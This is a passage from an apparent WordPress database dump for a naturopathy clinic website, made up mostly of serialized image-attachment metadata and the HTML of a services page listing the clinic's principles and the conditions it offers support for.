a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(247,69,'_wp_attached_file','2021/05/holistic-healer-icon-1.png'),(248,69,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:57;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-1-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-1-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-1-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-1-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-1-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-1-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(249,70,'_wp_attached_file','2021/05/holistic-healer-icon-5.png'),(250,70,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:56;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-5.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-5-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-5-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-5-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-5-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-5-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-5-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(251,71,'_wp_attached_file','2021/05/holistic-healer-icon-10.png'),(252,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:56;s:6:\"height\";i:96;s:4:\"file\";s:35:\"2021/05/holistic-healer-icon-10.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-10-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-10-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-10-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-10-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-10-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:37:\"holistic-healer-icon-10-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(253,72,'_wp_attached_file','2021/05/holistic-healer-24.png'),(254,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:245;s:4:\"file\";s:30:\"2021/05/holistic-healer-24.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-300x213.png\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:31:\"holistic-healer-24-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"holistic-healer-24-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:32:\"holistic-healer-24-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(255,73,'_wp_attached_file','2021/05/holistic-healer-46.png'),(256,73,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:126;s:6:\"height\";i:198;s:4:\"file\";s:30:\"2021/05/holistic-healer-46.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"holistic-healer-46-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-46-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:31:\"holistic-healer-46-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-46-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-46-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"holistic-healer-46-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:32:\"holistic-healer-46-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(257,74,'_wp_attached_file','2021/05/holistic-healer-icon-2.png'),(258,74,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:56;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-2.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-2-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-2-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-2-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-2-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-2-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-2-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(259,75,'_wp_attached_file','2021/05/holistic-healer-icon-7.png'),(260,75,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:57;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-7.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-7-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-7-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-7-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-7-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-7-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-7-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(261,76,'_wp_attached_file','2021/05/holistic-healer-icon-4.png'),(262,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:56;s:6:\"height\";i:96;s:4:\"file\";s:34:\"2021/05/holistic-healer-icon-4.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-4-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:35:\"holistic-healer-icon-4-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-4-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-4-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:34:\"holistic-healer-icon-4-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:36:\"holistic-healer-icon-4-2880x1800.png\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(263,77,'_wp_attached_file','2021/05/holistic-healer-53.jpg'),(264,77,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1998;s:6:\"height\";i:535;s:4:\"file\";s:30:\"2021/05/holistic-healer-53.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"holistic-healer-53-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"holistic-healer-53-1024x274.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-768x206.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"holistic-healer-53-1536x411.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:411;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:31:\"holistic-healer-53-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:31:\"holistic-healer-53-1080x289.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:4:\"file\";s:32:\"holistic-healer-53-2880x1800.jpg\";s:5:\"width\";i:2880;s:6:\"height\";i:1800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:31:\"holistic-healer-53-1280x343.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-980x262.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"holistic-healer-53-480x129.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(265,28,'_et_pb_built_for_post_type','page'),(266,28,'_et_pb_ab_subjects',''),(267,28,'_et_pb_enable_shortcode_tracking',''),(268,28,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"28\" /]'),(269,28,'_et_pb_custom_css',''),(270,28,'_et_pb_gutter_width','3'),(271,28,'_thumbnail_id','0'),(272,28,'_global_colors_info','{}'),(273,28,'_et_pb_first_image',''),(274,28,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_0 et_pb_with_background et_section_regular\" >\n \n \n \n \n <div class=\"et_pb_row et_pb_row_0 et_pb_equal_columns\">\n <div class=\"et_pb_column et_pb_column_3_5 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_0 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">Make the shift to a more holistic health approach.</div>\n </div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_1 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</p>\n<p>first, do no harm<br />\nthe healing power of nature<br />\nidentify and treat the cause <br />\ndoctor as teacher<br />\ntreat the person as a whole<br />\nprevention</p>\n<p>We can support health in many conditions, including:</p>\n<p>digestive issues (IBS, IBD, GORD, bloating, poor digestion)<br />\nnervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)<br />\nmetabolic dysfunction (insulin resistance)<br />\nimmune dysfunction (autoimmunity, recurrent infections)<br />\nthyroid conditions (hyper/hypothyroidism)<br />\nwomen’s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)<br />\nskin health (acne, eczema/dermatitis, rosacea)<br />\ncardiovascular health (chronic inflammation, high cholesterol)<br />\nmen’s health (prostate issues, sexual health)<br />\nchildren’s health (poor immunity, digestive issues, behavioural issues)</p>\n<p>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.<br />\nWe offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_2_5 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child\">\n \n \n <div class=\"et_pb_module et_pb_image et_pb_image_0\">\n \n \n <span class=\"et_pb_image_wrap \"><img decoding=\"async\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" alt=\"\" title=\"IMG_20210503_205936_105\" height=\"auto\" width=\"auto\" srcset=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg 1434w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105-1280x1280.jpg 1280w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105-980x980.jpg 980w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105-480x480.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1434px, 100vw\" class=\"wp-image-243\" /></span>\n </div><div class=\"et_pb_module et_pb_image et_pb_image_1\">\n \n \n <span class=\"et_pb_image_wrap \"><img decoding=\"async\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" alt=\"\" title=\"IMG_20200714_175859_865\" height=\"auto\" width=\"auto\" srcset=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg 2048w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865-1280x853.jpg 1280w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865-980x653.jpg 980w, https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865-480x320.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 2048px, 100vw\" class=\"wp-image-245\" /></span>\n </div><div class=\"et_pb_module et_pb_image et_pb_image_2\">\n \n \n <span class=\"et_pb_image_wrap \"><img decoding=\"async\" src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" alt=\"\" title=\"IMG_20210701_202413_037\" height=\"auto\" width=\"auto\" srcset=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg 2279w, https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-1280x853.jpg 1280w, https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-980x653.jpg 980w, https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-480x320.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 2279px, 100vw\" class=\"wp-image-343\" /></span>\n </div>\n </div> <!-- .et_pb_column -->\n \n \n </div> <!-- .et_pb_row -->\n \n \n </div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_1 et_pb_with_background et_pb_section_parallax et_section_regular\" >\n \n \n \n \n <div class=\"et_pb_row et_pb_row_1\">\n <div class=\"et_pb_column et_pb_column_4_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_2 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">Clinic info</div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column -->\n \n \n </div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_2\">\n <div class=\"et_pb_column et_pb_column_1_3 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough\">\n \n \n <div class=\"et_pb_module et_pb_text et_pb_text_3 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n <div class=\"et_pb_text_inner\">Location<br />\nKalamunda & online</div>\n </div> <!-- .et_pb_text -->\n </div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_3 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough\">\n \n \n <div class=\"et_pb_module et_pb_text 